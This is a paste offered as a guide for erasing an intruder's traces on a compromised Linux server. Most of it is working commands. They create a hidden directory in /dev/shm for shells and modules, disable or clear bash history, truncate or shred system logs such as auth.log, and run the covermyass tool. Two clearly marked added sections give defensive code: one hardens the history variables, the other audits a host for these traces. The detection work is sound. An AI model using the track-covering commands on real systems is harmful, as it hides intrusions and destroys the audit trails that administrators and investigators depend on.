betrayed

hide/remove tracks on hacked linux machine

Apr 28th, 2021
----------------------------------------------------------------------
[ASCII-art banner: "Anonymity"]

A comprehensive guide on how to remove system presence on a
hacked linux machine / server. Source: Null-Byte
----------------------------------------------------------------------
CREATE SECRET DIRECTORY
----------------------------------------------------------------------
# Depending on your privileges, search for all
# directories you have rights to write to (the '-perm -222'
# test matches directories that are writable by everyone):

find / -perm -222 -type d 2>/dev/null

# Pick a directory and create a hidden sub-directory
# inside it:

mkdir /dev/shm/.secret

# To list the directory's content, use the command:

ls -l /dev/shm/.secret

# You can also use the statement below to
# view the hidden sub-directories themselves:

ls -la /dev/shm/

# This hidden directory is designed to write code,
# upload modules, shells, etc. Once finished, you
# can delete it via...

rm -rf /dev/shm/.secret

----------------------------------------------------------------------
REMOVE BASH COMMAND HISTORY
----------------------------------------------------------------------
# You can use the 'history' command to view all
# statements and commands used in the current
# bash session. History is written to the file named by
# the HISTFILE environment variable, which is usually '.bash_history'.
# By typing...

echo $HISTFILE

# ...you can view for certain where it is stored.
# Type the following statement to stop history from being saved:

unset HISTFILE

# Either of the statements below has the same effect by
# pointing the history file at /dev/null:

HISTFILE=/dev/null
export HISTFILE=/dev/null

# You can also set the number of commands kept in memory to zero
# by using either of the following statements:

HISTSIZE=0
export HISTSIZE=0

# ...or you can limit the number of lines allowed in the
# file. Both lines below can be utilized:

HISTFILESIZE=0
export HISTFILESIZE=0

# You may also want to disable history outright. This can be
# suspicious but is an alternative.

set +o history

# You can re-enable it with the following command:

set -o history

# Additionally, you can use the 'shopt' command to enable/disable it:

Disable: shopt -ou history
Enable: shopt -os history

# To clear the history, you can input:

history -c

# ...then to write the changes to disk, enter:

history -w

# 'history -c' is only effective for the current
# session. To make sure history is cleared completely when
# exiting the shell, input:

cat /dev/null > ~/.bash_history && history -c && exit

# The 'kill' command will also let you exit the shell without
# saving history. Input as follows:

kill -9 $$
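
# Defensive counterpart to this section, added here as an example (it is not
# part of the original paste or of Null-Byte's material): an administrator can
# make the history variables read-only in a login drop-in so that the
# 'unset HISTFILE', 'HISTFILE=/dev/null' and 'HISTSIZE=0' statements above
# fail in every shell that sources it. The script assumes bash is installed;
# the drop-in path is left to the caller (a temporary file in the demo, a
# file under /etc/profile.d/ on a real host). The check function sources the
# snippet in a fresh bash, runs the tampering statements, and prints the
# values that survive.

```shell
#!/usr/bin/env bash
# Added defensive example, not code from the original paste.
# Assumes bash; the drop-in location is chosen by the caller.

# write_history_hardening FILE: emit the drop-in snippet into FILE.
write_history_hardening() {
  cat > "$1" <<'EOF'
# Keep a large, timestamped history and append it after every command.
HISTFILE="$HOME/.bash_history"
HISTSIZE=10000
HISTFILESIZE=20000
HISTTIMEFORMAT='%F %T '
shopt -s histappend
PROMPT_COMMAND='history -a'
# readonly turns any later assignment or unset of these variables into an error.
readonly HISTFILE HISTSIZE HISTFILESIZE HISTTIMEFORMAT PROMPT_COMMAND
EOF
}

# check_history_lock FILE: source FILE in a fresh bash, attempt the tampering
# statements from the guide, and print the HISTFILE/HISTSIZE values that remain.
check_history_lock() {
  bash -c '. "$1"
    HISTFILE=/dev/null
    unset HISTFILE HISTSIZE
    export HISTSIZE=0
    printf "%s %s\n" "$HISTFILE" "$HISTSIZE"' _ "$1" 2>/dev/null
}

# Stand-alone demo: use a temporary file instead of /etc/profile.d.
if [ -z "${HISTLOCK_NO_DEMO:-}" ]; then
  tmp=$(mktemp)
  write_history_hardening "$tmp"
  check_history_lock "$tmp"     # prints "<HOME>/.bash_history 10000"
  rm -f "$tmp"
fi
```

# Two caveats: a later rc file that also sets PROMPT_COMMAND will error once
# it is read-only, so drop it from the 'readonly' list where that happens; and
# this only governs bash's own bookkeeping, so a user who runs 'kill -9 $$',
# starts a different shell or edits ~/.bash_history directly is outside its
# reach. Complete command accounting needs a kernel-side source such as
# auditd's execve rules rather than shell history.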
----------------------------------------------------------------------
CLEARING LOG FILES
----------------------------------------------------------------------
# There are various system logs stored on linux systems.
# Here are some common ones:

# /var/log/auth.log Authentication
# /var/log/cron.log Cron Jobs
# /var/log/maillog Mail
# /var/log/httpd Apache

# You can remove a log with the 'rm' command. This, however,
# will likely raise suspicion. The more favorable choice is
# to empty the log without deleting the log file:

truncate -s 0 /var/log/<YOUR_LOG>

# 'truncate' is not always available. If not, the
# same result can be accomplished by entering any of the
# command statements below:

echo '' > /var/log/<YOUR_LOG>
> /var/log/<YOUR_LOG>
shred /var/log/<YOUR_LOG>
shred -zu /var/log/<YOUR_LOG>
cat /dev/null > /var/log/<YOUR_LOG>
true | tee /var/log/<YOUR_LOG>
dd if=/dev/null of=/var/log/<YOUR_LOG>
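
# Every technique in the three sections above leaves a trace of its own:
# a dot-named directory in a world-writable scratch area, a log file that
# is exactly zero bytes while its neighbours keep growing, and start-up
# files that persistently disable history. The audit below, added here as
# an example (not part of the original paste or of Null-Byte's material),
# looks for those traces. Paths are taken relative to a ROOT argument so the
# same functions run against "/" on a live host or against the constructed
# fixture used by the demo; every file, directory and log line in that
# fixture is constructed sample data.

```shell
#!/bin/sh
# Added defensive example, not code from the original paste.
# ROOT is "/" on a real host or a constructed fixture directory.

# find_hidden_dirs ROOT: dot-named directories in the writable scratch areas
# the guide suggests (/dev/shm, /tmp, /var/tmp) are rarely legitimate.
find_hidden_dirs() {
  for d in dev/shm tmp var/tmp; do
    [ -d "$1/$d" ] || continue
    find "$1/$d" -mindepth 1 -maxdepth 2 -type d -name '.*' 2>/dev/null
  done
}

# find_empty_logs ROOT: a zero-byte file in var/log is the signature of
# 'truncate -s 0', '> file', 'cat /dev/null > file' and friends.
find_empty_logs() {
  find "$1/var/log" -maxdepth 1 -type f -size 0 2>/dev/null
}

# find_history_tamper ROOT: shell start-up files that disable history
# (HISTFILE=/dev/null, HISTSIZE=0, HISTFILESIZE=0, unset HISTFILE, set +o history).
find_history_tamper() {
  for f in "$1"/root/.bashrc "$1"/root/.profile "$1"/home/*/.bashrc "$1"/home/*/.profile; do
    [ -f "$f" ] || continue
    grep -qE 'HISTFILE=/dev/null|HIST(FILE)?SIZE=0|unset +HISTFILE|set \+o history|shopt -ou history' "$f" \
      && printf '%s\n' "$f"
  done
  return 0
}

# audit_host ROOT: print every finding, one per line, tagged with its type.
audit_host() {
  find_hidden_dirs "$1"    | sed 's/^/hidden-dir     /'
  find_empty_logs "$1"     | sed 's/^/empty-log      /'
  find_history_tamper "$1" | sed 's/^/history-tamper /'
}

# build_fixture DIR: constructed sample tree used by the stand-alone demo.
build_fixture() {
  mkdir -p "$1/dev/shm/.secret" "$1/tmp/legit" "$1/var/log" "$1/home/alice"
  printf 'Apr 28 10:00:01 host sshd[1]: Accepted publickey for alice\n' > "$1/var/log/auth.log"
  : > "$1/var/log/cron.log"                       # emptied, as after 'truncate -s 0'
  printf 'export HISTFILE=/dev/null\n' > "$1/home/alice/.bashrc"
  printf 'alias ll="ls -l"\n' > "$1/home/alice/.profile"
}

# Stand-alone run: audit the directory given as argument, else the fixture.
if [ -n "${1:-}" ]; then
  audit_host "$1"
else
  demo=$(mktemp -d)
  build_fixture "$demo"
  audit_host "$demo"
  rm -rf "$demo"
fi
```

# On a live host the findings are leads, not verdicts: compare an empty log's
# mtime with the last entry in a rotated sibling, and remember that an
# attacker with root can also forge the start-up files. The durable
# mitigation is to get logs off the box (remote syslog) and to make local
# log files append-only, so that 'truncate' and '>' fail rather than succeed.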
----------------------------------------------------------------------
AUTOMATION OF PRESENCE REMOVAL
----------------------------------------------------------------------
# To automate secure deletion and removal of system presence, you
# can use CoverMyAss at: github.com/sundowndev/covermyass
# It utilizes 'wget' and will work as long as there's internet access.

# Find a writable directory, then use 'chmod' to make it executable:

chmod +x covermyass

# ...then execute it:

./covermyass

# In case you need a quick exit, enter:

./covermyass now
----------------------------------------------------------------------